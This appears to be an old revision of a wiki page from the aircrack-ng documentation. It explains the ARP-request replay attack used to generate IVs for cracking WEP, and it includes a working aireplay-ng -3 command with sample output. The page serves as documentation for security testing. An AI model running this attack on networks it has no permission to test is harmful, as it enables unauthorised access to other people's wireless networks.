User Tools

Site Tools


This is an old revision of the document!

ARP-request reinjection

The classic ARP-request replay attack is the most effective to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B), or a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

Please note that you can also reuse ARP requests from a previous capture using the -r switch.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
arp-request_reinjection.1163949138.txt.gz · Last modified: 2007/02/19 19:37 (external edit)